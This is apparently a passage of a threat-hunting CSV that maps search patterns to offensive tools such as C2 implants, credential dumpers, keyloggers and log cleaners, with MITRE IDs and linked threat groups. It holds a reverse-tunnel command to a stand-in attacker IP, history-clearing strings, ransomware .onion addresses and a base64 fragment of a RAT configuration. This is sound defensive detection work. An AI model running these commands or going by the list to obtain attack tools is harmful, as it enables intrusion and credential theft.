"*chvancooten/NimPlant*",".{0,1000}chvancooten\/NimPlant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","38271" "*chvancooten/OSEP-Code-Snippets*",".{0,1000}chvancooten\/OSEP\-Code\-Snippets.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","38272" "*CICADA8 Research Team*",".{0,1000}CICADA8\sResearch\sTeam.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","38273" "*CICADA8-Research/IHxExec*",".{0,1000}CICADA8\-Research\/IHxExec.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","1","N/A","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","38274" "*CICADA8-Research/RemoteKrbRelay*",".{0,1000}CICADA8\-Research\/RemoteKrbRelay.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - 
T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","38275" "*CICADA8-Research/Spyndicapped*",".{0,1000}CICADA8\-Research\/Spyndicapped.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","1","N/A","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","38276" "*cilbuP\\sresU\\:C*",".{0,1000}cilbuP\\\\sresU\\\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38277" "*cilbuP\sresU\:C*",".{0,1000}cilbuP\\sresU\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38278" "*CIMplant.exe *",".{0,1000}CIMplant\.exe\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","38279" "*CIMplant.sln*",".{0,1000}CIMplant\.sln.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral 
Movement","https://github.com/RedSiege/CIMplant","1","1","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","38280" "*CIMplant-main*",".{0,1000}CIMplant\-main.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","1","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","38281" "*Cipher7/ChaiLdr*",".{0,1000}Cipher7\/ChaiLdr.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","1","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","38282" "*cirt-default-usernames.txt*",".{0,1000}cirt\-default\-usernames\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38283" "*cirt-fuzzer*",".{0,1000}cirt\-fuzzer.{0,1000}","offensive_tool_keyword","cirt-fuzzer","A simple TCP/UDP protocol fuzzer.","T1046 - T1065 - T1190 - T1219 - T1221 - T1497","TA0001 - TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Sniffing & Spoofing","https://www.ecrimelabs.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38284" "*cisco2john.pl*",".{0,1000}cisco2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","38285" "*CiscoCXSecurity/creddump7*",".{0,1000}CiscoCXSecurity\/creddump7.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","38286" "*CiscoCXSecurity/linikatz*",".{0,1000}CiscoCXSecurity\/linikatz.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","38287" "*cisco-phone-query.sh*",".{0,1000}cisco\-phone\-query\.sh.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","38288" "*citronneur/pamspy*",".{0,1000}citronneur\/pamspy.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","38289" "*citronneur/pamspy/releases*",".{0,1000}citronneur\/pamspy\/releases.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/citronneur/pamspy","1","1","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","38290" "*cjelfplplebdjjenllpjcblmjkfcffne*",".{0,1000}cjelfplplebdjjenllpjcblmjkfcffne.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","38291" "*cjm00n/EvilSln*",".{0,1000}cjm00n\/EvilSln.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","1","N/A","N/A","10","","N/A","","","","38292" "*Ck5PX0lQX0hPU1QgPSAnZ29vZ2xlY2hyb21lYXV0by5zZXJ2ZWlyYy5jb20nCkxIT1NUID0gJzE5Mi4xNjguMS4zJwpMUE9SVCA9IDQ0MwpUSU1FX1NMRUVQID0gMTAKClRFTVBfUEFUSCA9IHRlbXBmaWxlLmdldHRlbXBkaXIoKQpSRUdfUEFUSCA9IHIiU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuIgpSRUdfTkFNRSA9ICJHb29nbGVDaHJvbWVBdXRvTGF1bmNoXzk5MjEzNjYxMDJXRUFEMjEzMTJFU0FEMzEzMTIiClJFR19WQUxVRSA*",".{0,1000}Ck5PX0lQX0hPU1QgPSAnZ29vZ2xlY2hyb21lYXV0by5zZXJ2ZWlyYy5jb20nCkxIT1NUID0gJzE5Mi4xNjguMS4zJwpMUE9SVCA9IDQ0MwpUSU1FX1NMRUVQID0gMTAKClRFTVBfUEFUSCA9IHRlbXBmaWxlLmdldHRlbXBkaXIoKQpSRUdfUEFUSCA9IHIiU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuIgpSRUdfTkFNRSA9ICJHb29nbGVDaHJvbWVBdXRvTGF1bmNoXzk5MjEzNjYxMDJXRUFEMjEzMTJFU0FEMzEzMTIiClJFR19WQUxVRSA.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#base64","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","38293" "*cki3klxqycazagx3r5prae3nmfvxmwa34beknr3il4uf76vxd76akqid.onion*",".{0,1000}cki3klxqycazagx3r5prae3nmfvxmwa34beknr3il4uf76vxd76akqid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","38294" "*class MetasploitModule*",".{0,1000}class\sMetasploitModule.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38296" "*class Plugin::Nemesis < Msf::Plugin*",".{0,1000}class\sPlugin\:\:Nemesis\s\<\sMsf\:\:Plugin.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","38297" "*class ReverseBash*",".{0,1000}class\sReverseBash.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","38298" "*class T2WRPCServer(*",".{0,1000}class\sT2WRPCServer\(.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","38299" 
"*Cleanup-57BFF48E-24FB-48E9-A390-AC62ADF38B07.json*",".{0,1000}Cleanup\-57BFF48E\-24FB\-48E9\-A390\-AC62ADF38B07\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","38300" "*clear; history -c*",".{0,1000}clear\;\shistory\s\-c.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","0","#linux","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","38301" "*clear_command_history.py*",".{0,1000}clear_command_history\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","38302" "*clear_me_from_history()?*",".{0,1000}clear_me_from_history\(\)\?.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","38303" "*ClearEventlog.vbs*",".{0,1000}ClearEventlog\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - 
T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","38305" "*ClearEventlog.vbs*",".{0,1000}ClearEventlog\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","38306" "*Clearing Defender Quarantine Files*",".{0,1000}Clearing\sDefender\sQuarantine\sFiles.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","38307" "*Clearing Shim Cache Data...*",".{0,1000}Clearing\sShim\sCache\sData\.\.\..{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","38308" "*Clear-KeyCredentials -target 
*",".{0,1000}Clear\-KeyCredentials\s\-target\s.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","38309" "*ClearnEventRecordID {*",".{0,1000}ClearnEventRecordID\s\{.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","38311" "*ClearnEventRecordID.ps1*",".{0,1000}ClearnEventRecordID\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","38312" "*ClearnIpAddress.ps1*",".{0,1000}ClearnIpAddress\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","38313" 
"*clem9669/hashcat-rule*",".{0,1000}clem9669\/hashcat\-rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","#linux","N/A","10","5","435","47","2024-09-02T20:14:15Z","2020-03-06T17:20:40Z","38315" "*clem9669_case.rule*",".{0,1000}clem9669_case\.rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","#linux","N/A","10","5","435","47","2024-09-02T20:14:15Z","2020-03-06T17:20:40Z","38316" "*clem9669_large.rule*",".{0,1000}clem9669_large\.rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","#linux","N/A","10","5","435","47","2024-09-02T20:14:15Z","2020-03-06T17:20:40Z","38317" "*clem9669_medium.rule*",".{0,1000}clem9669_medium\.rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","#linux","N/A","10","5","435","47","2024-09-02T20:14:15Z","2020-03-06T17:20:40Z","38318" "*clem9669_small.rule*",".{0,1000}clem9669_small\.rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. 
Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","#linux","N/A","10","5","435","47","2024-09-02T20:14:15Z","2020-03-06T17:20:40Z","38319" "*clem9669_wordlist_medium.7z*",".{0,1000}clem9669_wordlist_medium\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","N/A","3","280","45","2025-04-22T14:34:10Z","2020-10-21T14:37:53Z","38320" "*clem9669_wordlist_small.7z*",".{0,1000}clem9669_wordlist_small\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","N/A","3","280","45","2025-04-22T14:34:10Z","2020-10-21T14:37:53Z","38321" "*-cli install github *",".{0,1000}\-cli\sinstall\sgithub\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","38322" "*-cli install github *Apollo.*",".{0,1000}\-cli\sinstall\sgithub\s.{0,1000}Apollo\..{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","38323" "*-cli payload start 
*",".{0,1000}\-cli\spayload\sstart\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","38324" "*click_to_exploit.docx*",".{0,1000}click_to_exploit\.docx.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","N/A","1","8","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z","38325" "*clickjack_attack.html*",".{0,1000}clickjack_attack\.html.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","38326" "*clickjack_victim.html*",".{0,1000}clickjack_victim\.html.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","38327" "*clickme*exploit.html*",".{0,1000}clickme.{0,1000}exploit\.html.{0,1000}","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","N/A","2","104","27","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z","38328" "*client $ATTACKER-IP:$ATTACKER-PORT R:$PORT:socks*",".{0,1000}client\s\$ATTACKER\-IP\:\$ATTACKER\-PORT\sR\:\$PORT\:socks.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38329" "*client.py --server-ip * --server-port *",".{0,1000}client\.py\s\-\-server\-ip\s.{0,1000}\s\-\-server\-port\s.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","N/A","10","10","589","128","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z","38330" "*client.py*--domain*--hashes*",".{0,1000}client\.py.{0,1000}\-\-domain.{0,1000}\-\-hashes.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - 
TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","N/A","10","10","589","128","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z","38331" "*clientcuworpelkdwecucgvfhp5uz5n7uohsnokndrlhm2zkntyg3had.onion*",".{0,1000}clientcuworpelkdwecucgvfhp5uz5n7uohsnokndrlhm2zkntyg3had\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","38334" "*ClipboardImplant*",".{0,1000}ClipboardImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","38335" "*clipboardinject.*",".{0,1000}clipboardinject\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
